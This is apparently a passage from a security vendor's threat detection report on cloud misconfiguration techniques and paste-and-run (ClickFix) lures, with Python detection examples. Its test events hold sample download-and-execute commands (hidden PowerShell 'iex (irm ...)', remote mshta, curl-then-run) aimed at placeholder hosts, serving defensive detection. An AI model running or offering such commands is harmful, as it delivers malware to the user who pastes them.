Midyear techniques

Two new cloud techniques made their way into the top 10 for the first half of 2025: Data from Cloud Storage and Disable or Modify Cloud Firewall

Over the last few years, we’ve expanded our detection and response offerings from endpoints to identities, the cloud, and beyond. It’s taken time, but customer adoption of our non-endpoint products, together with the ongoing expansion of detection coverage for them, has grown enough over the last 18 months or so to shift our technique rankings.

First came T1078.004: Cloud Accounts and T1114.003: Email Forwarding Rule. Then T1564.008: Email Hiding Rules. Now two more cloud-related techniques have entered our top 10: T1530: Data from Cloud Storage and T1562.007: Disable or Modify Cloud Firewall.

Top 10 MITRE ATT&CK® techniques from the first half of 2025

Since we covered the remaining top techniques extensively just a few months ago in the 2025 Threat Detection Report (or in past reports, as the case may be), we’re going to focus this section on the two new techniques, plus T1204.004: Malicious Copy and Paste.

New cloud techniques

As we hinted earlier—and like much of the suspicious identity behavior we’re detecting—our detections for T1530 and T1562.007 straddle the line between overt threats and risks. Let’s start by explaining exactly what we’re detecting for each of these techniques, and then we’ll explore the implicit challenge underlying our detection strategies for these two techniques.

T1530: Data from Cloud Storage
The overwhelming majority of detections associated with this technique involve someone successfully enabling public access on an AWS S3 bucket, whether by attaching a bucket policy or ACL that grants access to everyone or by turning off the bucket’s Block Public Access settings. Exposing S3 buckets to the open internet is a misconfiguration that has enabled countless breaches over the last decade. It is also legitimate AWS functionality, and there are numerous reasons an engineer or admin might want a public bucket (static website hosting and public datasets are two common ones). When you’re running detection at scale across departments or environments you’re not intimately familiar with, it’s incredibly difficult to ascribe intent to this kind of behavior.

T1562.007: Disable or Modify Cloud Firewall
We detect this technique across multiple cloud platforms, and the behavior is fundamentally the same everywhere: opening ingress ports used for remote administration (RDP, SSH, VNC, and the like) to connections from any external IP address, or otherwise removing firewall policies or rules in Amazon Web Services (AWS), Azure, or Google Cloud Platform (GCP). Allowing connections from any address on the internet into your cloud infrastructure is a dangerous misconfiguration (or an overtly malicious act) that can have serious consequences. It is also a legitimate function of your cloud firewall with legitimate use cases. Intent is once again hard to ascribe from afar, and we are again detecting a risk rather than a definite threat.

The challenge
In both cases we’re largely detecting behavior that is risky, and it’s hard to programmatically confirm whether that behavior is malicious, suspicious, unwanted, or entirely benign. In fact, for both techniques, there are effectively four things that could be happening:

Again, as with the suspicious VPN examples in the Trends section, organizations are forced to choose between detecting high-risk activity along with the benign, or accepting that level of risk exposure by ignoring the activity altogether. Given the precedent of breaches that have historically resulted from lenient access policies for cloud resources, we believe these are risks organizations should detect and investigate as far as they are able.

That is why we approach detection from two standpoints:

  • First, an atomic approach that detects risky behavior that could be malicious or legitimate admin activity
  • Second, a holistic narrative approach that builds several atomic detections together into a threat timeline that describes when activity shifts into a true threat

This tiered approach allows us to make fine-tuned detectors while also enabling enough contextual information for organizations to accurately determine if the behavior is malicious or benign.
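To make the two tiers concrete, here is an added example in Python (it is not the authors’ detection logic and not code from the report). It runs two atomic detectors, one per technique, over a handful of constructed CloudTrail-shaped events, then a narrative layer that threads the atomic hits per identity and only calls the sequence a threat when the same identity exposes storage and opens the firewall within a window, or when a different principal reads a bucket shortly after it was exposed. The field names (eventName, userIdentity.arn, requestParameters) follow CloudTrail’s shape, but the 60-minute window, the port list, the identities, bucket names and IP addresses are all assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"  # S3 ACL grantee meaning "everyone"
ANY_CIDR = {"0.0.0.0/0", "::/0"}
REMOTE_ADMIN_PORTS = {22: "SSH", 3389: "RDP", 5900: "VNC"}
WINDOW = timedelta(minutes=60)  # assumption: how long two atomic hits still count as one story

def _ts(ev): return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
def _actor(ev): return ev.get("userIdentity", {}).get("arn") or "anonymous"
def _params(ev): return ev.get("requestParameters") or {}

def detect_s3_public(ev):
    """Atomic T1530: did this call open a bucket to everyone? Returns a detail string or None."""
    name, p = ev["eventName"], _params(ev)
    bucket = p.get("bucketName", "?")
    if name == "PutBucketAcl":
        grants = p.get("AccessControlPolicy", {}).get("AccessControlList", {}).get("Grant", [])
        if any(g.get("Grantee", {}).get("URI") == ALL_USERS for g in grants):
            return f"PutBucketAcl granted AllUsers on {bucket}"
    elif name == "PutBucketPolicy":
        for st in p.get("bucketPolicy", {}).get("Statement", []):
            if st.get("Effect") == "Allow" and st.get("Principal") in ("*", {"AWS": "*"}):
                return f"PutBucketPolicy allows Principal * on {bucket}"
    elif name == "PutPublicAccessBlock":  # not public by itself, but it removes the guardrail
        off = sorted(k for k, v in p.get("PublicAccessBlockConfiguration", {}).items() if v is False)
        if off:
            return f"PutPublicAccessBlock turned off {', '.join(off)} on {bucket}"
    return None

def detect_firewall_opened(ev):
    """Atomic T1562.007: a security-group rule admitting a remote-admin port from any address."""
    if ev["eventName"] != "AuthorizeSecurityGroupIngress":
        return None
    p = _params(ev)
    for perm in p.get("ipPermissions", {}).get("items", []):
        lo, hi = perm.get("fromPort", -1), perm.get("toPort", -1)
        if -1 in (lo, hi):  # no port range (e.g. ipProtocol "-1", all traffic) means every port
            lo, hi = 0, 65535
        exposed = [n for port, n in REMOTE_ADMIN_PORTS.items() if lo <= port <= hi]
        cidrs = {r.get("cidrIp") for r in perm.get("ipRanges", {}).get("items", [])}
        cidrs |= {r.get("cidrIpv6") for r in perm.get("ipv6Ranges", {}).get("items", [])}
        wide = sorted(cidrs & ANY_CIDR)
        if exposed and wide:
            return f"{p.get('groupId', '?')} admits {'/'.join(exposed)} from {', '.join(wide)}"
    return None

ATOMIC = {"T1530": detect_s3_public, "T1562.007": detect_firewall_opened}

def atomic_hits(events):
    """First tier: each hit is a risk record (admin or adversary), not yet a threat verdict."""
    return [{"time": _ts(ev), "actor": _actor(ev), "technique": tid, "detail": detail,
             "bucket": _params(ev).get("bucketName")}
            for ev in sorted(events, key=_ts) for tid, fn in ATOMIC.items() if (detail := fn(ev))]

def build_timelines(events):
    """Second tier: thread hits per identity and say when the sequence reads as a threat."""
    by_actor = defaultdict(list)
    for h in atomic_hits(events):
        by_actor[h["actor"]].append(h)
    timelines = {}
    for actor, hs in by_actor.items():
        reasons = []
        techs = sorted({h["technique"] for h in hs})
        if len(techs) > 1 and hs[-1]["time"] - hs[0]["time"] <= WINDOW:
            reasons.append(f"{' + '.join(techs)} by one identity within {WINDOW}")
        for h in [x for x in hs if x["technique"] == "T1530"]:
            # follow-on: a different principal reads the bucket within WINDOW of its exposure
            reads = [ev for ev in events if ev["eventName"] == "GetObject" and _actor(ev) != actor
                     and _params(ev).get("bucketName") == h["bucket"]
                     and h["time"] <= _ts(ev) <= h["time"] + WINDOW]
            for ev in sorted(reads, key=_ts)[:1]:
                reasons.append(f"{h['bucket']} read by {_actor(ev)} from {ev['sourceIPAddress']} "
                               f"{_ts(ev) - h['time']} after exposure")
        timelines[actor] = {"verdict": "threat" if reasons else "risk",
                            "hits": [h["detail"] for h in hs], "reasons": reasons}
    return timelines

def _ev(time, name, actor, params, src="203.0.113.10"):  # constructed CloudTrail-shaped record
    return {"eventTime": time, "eventName": name, "sourceIPAddress": src,
            "userIdentity": {"arn": actor} if actor else {}, "requestParameters": params}

def _sg(group, lo, hi, cidr):  # requestParameters of AuthorizeSecurityGroupIngress, one TCP rule
    return {"groupId": group, "ipPermissions": {"items": [{"ipProtocol": "tcp", "fromPort": lo,
            "toPort": hi, "ipRanges": {"items": [{"cidrIp": cidr}]}}]}}

ALICE, BOB, CAROL = (f"arn:aws:iam::111122223333:user/{n}" for n in ("admin-alice", "contractor-bob", "devops-carol"))
EVENTS = [  # constructed sample, not real telemetry
    _ev("2025-06-03T09:30:00Z", "AuthorizeSecurityGroupIngress", CAROL, _sg("sg-0c1", 443, 443, "0.0.0.0/0")),
    _ev("2025-06-03T09:45:00Z", "AuthorizeSecurityGroupIngress", CAROL, _sg("sg-0c1", 22, 22, "10.0.0.0/8")),
    _ev("2025-06-03T10:00:00Z", "PutBucketPolicy", ALICE, {"bucketName": "marketing-assets", "bucketPolicy": {
        "Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "*"}]}}),
    _ev("2025-06-03T10:05:00Z", "PutPublicAccessBlock", BOB, {"bucketName": "finance-exports", "PublicAccessBlockConfiguration":
        {k: False for k in ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")}}),
    _ev("2025-06-03T10:12:00Z", "AuthorizeSecurityGroupIngress", BOB, _sg("sg-0ab", 3389, 3389, "0.0.0.0/0")),
    _ev("2025-06-03T10:20:00Z", "GetObject", None, {"bucketName": "finance-exports", "key": "q2/payroll.csv"}, src="198.51.100.7"),
]
```

Run `build_timelines(EVENTS)`: admin-alice’s public bucket policy stays a single atomic hit with the verdict `risk`, which is exactly the case the text describes (possibly a legitimate public bucket, possibly not), while contractor-bob’s timeline is escalated to `threat` for two reasons, the T1530 + T1562.007 pairing within the window and an anonymous read of the newly exposed bucket. devops-carol’s two rule changes (HTTPS from anywhere, SSH from an internal range) never become hits, which is where the port and CIDR gating in the atomic detector earns its keep. Note that the narrative tier still runs on the same raw log; what it adds is the per-identity sequencing that a single-event detector cannot see.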

While you could monitor logs from your cloud provider and wait to detect until you see evidence of exfiltration or other malicious activity, the damage may already be done at that point.

T1204.004: Malicious Copy and Paste

A relatively new entrant in MITRE ATT&CK, this technique encompasses the paste-and-run (aka ClickFix, fake CAPTCHA) activity that has dominated the initial access landscape for the last year. T1204.004 stays out of our top 10 primarily because the detectors we use to catch this behavior are broadly scoped and mapped to other techniques.

Paste and run certainly warrants discussion given its meteoric rise to prominence since we first started tracking it in August 2024. Adversaries leverage this technique to deliver stealers, RMM tools, backdoors, and more.

Paste and run comes in two primary flavors:

  • The user has to “fix” their access to a document, website, or software installation/update by following the instructions in the paste-and-run lure.
  • A CAPTCHA-style lure prompting the user to follow given instructions to prove they are a human, also to gain access to a document, website, or installation/update process.

Ultimately, the adversary is trying to dupe the user into “verifying” or “fixing” something by opening a Run box, terminal, or PowerShell window and pasting a command they never read. The lure typically spells out the keystrokes: Win+R to open the Run dialog (or Win+X for the power-user menu, which offers PowerShell or Terminal), Ctrl+V to paste the command the lure page has already placed on the clipboard, and Enter to run it.
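As an added example (not the authors’ detectors and not code from the report), the following Python scores constructed Sysmon Event ID 1 style process-creation records for the paste-and-run shape described above: an interpreter such as powershell.exe, cmd.exe or mshta.exe started by the user’s shell (explorer.exe, the parent of anything launched from the Run dialog) with a command line carrying a download cradle, an inline-execute, a hidden or encoded flag, or the “I am not a robot” comment that these lures often append. It also parses the Win+R history that Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is where an investigator can recover the pasted command from the host. The indicator list, thresholds, sample commands, hostnames and user names are assumptions made for the example, and the `example.invalid` URLs are placeholders.

```python
import re

# Interpreters that a pasted command typically lands in after Win+R, Win+X, or an open terminal.
PASTE_TARGETS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that mean a person typed or pasted the command, not a script, scheduler, or service.
USER_SHELL_PARENTS = {"explorer.exe", "windowsterminal.exe"}

INDICATORS = [  # (name, pattern) pairs; each is one piece of evidence, none is proof alone
    ("download_cradle", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|certutil|bitsadmin)\b", re.I)),
    ("inline_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta_remote", re.compile(r"\bmshta(?:\.exe)?\s+(?:https?:|\\\\)", re.I)),
    ("hidden_or_encoded", re.compile(r"-w(?:indowstyle)?\s+hidden\b|\s-(?:e|ec|enc|encodedcommand)\s|-nop\b", re.I)),
    ("lure_comment", re.compile(r"#.{0,40}(?:not a robot|verification|captcha)", re.I)),
]

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Label one process-creation event 'paste-and-run', 'suspicious', or 'benign' with its evidence."""
    matched = [name for name, rx in INDICATORS if rx.search(ev["CommandLine"])]
    interactive = _base(ev["Image"]) in PASTE_TARGETS and _base(ev["ParentImage"]) in USER_SHELL_PARENTS
    if interactive and (len(matched) >= 2 or {"lure_comment", "mshta_remote"} & set(matched)):
        return "paste-and-run", matched
    if matched:
        return "suspicious", matched  # has a cradle but not the user-pasted shape; other detectors own it
    return "benign", matched

def triage(events):
    """Everything that is not benign, paste-and-run first."""
    rows = []
    for ev in events:
        label, matched = classify(ev)
        if label != "benign":
            rows.append({"label": label, "user": ev["User"], "parent": _base(ev["ParentImage"]),
                         "indicators": matched, "cmd": ev["CommandLine"]})
    return sorted(rows, key=lambda r: r["label"] != "paste-and-run")

def runmru_commands(reg_query_output):
    """Host-side corroboration: parse `reg query` output of the RunMRU key; each value is '<cmd>\\1'."""
    cmds = []
    for line in reg_query_output.splitlines():
        m = re.match(r"\s*(\w+)\s+REG_SZ\s+(.*)$", line)
        if m and m.group(1) != "MRUList":
            cmds.append(m.group(2).rstrip().removesuffix("\\1"))
    return cmds

def _proc(image, parent, cmd, user="CORP\\jdoe"):
    """Constructed Sysmon Event ID 1 style record, reduced to the fields used here."""
    return {"Image": image, "ParentImage": parent, "CommandLine": cmd, "User": user}

EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed sample events, not real telemetry
    _proc(PS, EXPLORER, 'powershell -w hidden -c "iex (irm https://example.invalid/v.txt)" '
                        '# I am not a robot - reCAPTCHA Verification ID: 7321'),
    _proc(r"C:\Windows\System32\mshta.exe", EXPLORER, "mshta https://example.invalid/check.hta"),
    _proc(PS, EXPLORER, "powershell"),
    _proc(PS, r"C:\Windows\System32\services.exe",
          'powershell -nop -c "iex (iwr https://example.invalid/a.ps1)"', user="NT AUTHORITY\\SYSTEM"),
    _proc(r"C:\Windows\System32\cmd.exe", EXPLORER,
          'cmd /c "curl -s https://example.invalid/i.bat -o %TEMP%\\i.bat && %TEMP%\\i.bat"'),
]

RUNMRU_SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    powershell -w hidden -c "iex (irm https://example.invalid/v.txt)" # I am not a robot\1
    b    REG_SZ    notepad\1
    MRUList    REG_SZ    ab
"""

if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row["label"], row["user"], row["indicators"], row["cmd"], sep=" | ")
    print("RunMRU:", runmru_commands(RUNMRU_SAMPLE))
```

The parent check is what keeps this mapped to user execution rather than to every PowerShell cradle on the estate: the SYSTEM-launched cradle under services.exe is still flagged, but as `suspicious`, because a service or scheduled task running it is a different story (and a different ATT&CK technique) from a person pasting it into the Run box. A bare `powershell` from explorer.exe is benign, and a single cradle with no other evidence stays below the paste-and-run bar. On a real host, the RunMRU entry recovered by `runmru_commands` is often the quickest way to see the full pasted command when process telemetry has truncated or obfuscated it.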

The following is a non-exhaustive list of threats known to leverage paste and run for initial access:
